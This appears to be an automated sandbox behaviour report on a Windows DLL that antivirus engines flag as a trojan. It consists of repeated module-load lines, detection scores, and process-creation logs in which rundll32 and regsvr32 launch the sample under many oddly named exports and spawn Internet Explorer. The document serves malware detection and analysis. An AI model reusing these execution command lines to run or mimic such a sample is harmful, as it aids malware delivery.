                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: qT9Qk5aKTk.dllStatic PE information: Number of sections : 12 > 10
                      Source: qT9Qk5aKTk.dllVirustotal: Detection: 80%
                      Source: qT9Qk5aKTk.dllMetadefender: Detection: 59%
                      Source: qT9Qk5aKTk.dllReversingLabs: Detection: 82%
                      Source: qT9Qk5aKTk.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82974 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Exequatur
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Meith
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17458 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17462 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AquaticallyJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,EpisodicallyJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,KakapoJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,OverdistantnessJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,PseudopodalJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,MicrophageJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,CytostJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,ReattachJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,VigiaJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,PreallableJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AmphistomousJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AmericanisticJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,SuprahumanityJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,EupyrchroiteJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,SplitbeakJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AndirinJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DrailJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,ExequaturJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,MeithJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82974 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17458 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17462 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DAC6F608-1264-11EC-90E5-ECF4BB570DC9}.datJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF9BFE7BA6DBA411D3.TMPJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@64/163@14/7
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00EC757F
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00402143 push ecx; ret 0_2_00402153
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004020F0 push ecx; ret 0_2_004020F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECEAE5 push ds; retf 0_2_00ECEAEB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECE4C9 push ecx; ret 0_2_00ECE4CA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECAD50 push ecx; ret 0_2_00ECAD59
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00ECB10B push ecx; ret 0_2_00ECB11B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40397 push dword ptr [esp+0Ch]; ret 0_2_00E403AA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40397 push dword ptr [esp+10h]; ret 0_2_00E403EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C push dword ptr [ebp-0000027Ch]; ret 0_2_00E40231
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C push dword ptr [ebp-00000284h]; ret 0_2_00E40284
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C push dword ptr [esp+10h]; ret 0_2_00E40396
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40066 push dword ptr [ebp-0000027Ch]; ret 0_2_00E4009B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40005 push dword ptr [ebp-0000027Ch]; ret 0_2_00E40065
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E2143 push ecx; ret 2_2_005E2153
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_005E20F0 push ecx; ret 2_2_005E20F9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8E4C9 push ecx; ret 2_2_00C8E4CA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8EAE5 push ds; retf 2_2_00C8EAEB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8AD50 push ecx; ret 2_2_00C8AD59
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C8B10B push ecx; ret 2_2_00C8B11B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C push dword ptr [ebp-0000027Ch]; ret 3_2_00BF0231
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C push dword ptr [ebp-00000284h]; ret 3_2_00BF0284
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C push dword ptr [esp+10h]; ret 3_2_00BF0396
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0397 push dword ptr [esp+0Ch]; ret 3_2_00BF03AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0397 push dword ptr [esp+10h]; ret 3_2_00BF03EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0066 push dword ptr [ebp-0000027Ch]; ret 3_2_00BF009B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0005 push dword ptr [ebp-0000027Ch]; ret 3_2_00BF0065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970397 push dword ptr [esp+0Ch]; ret 5_2_009703AA
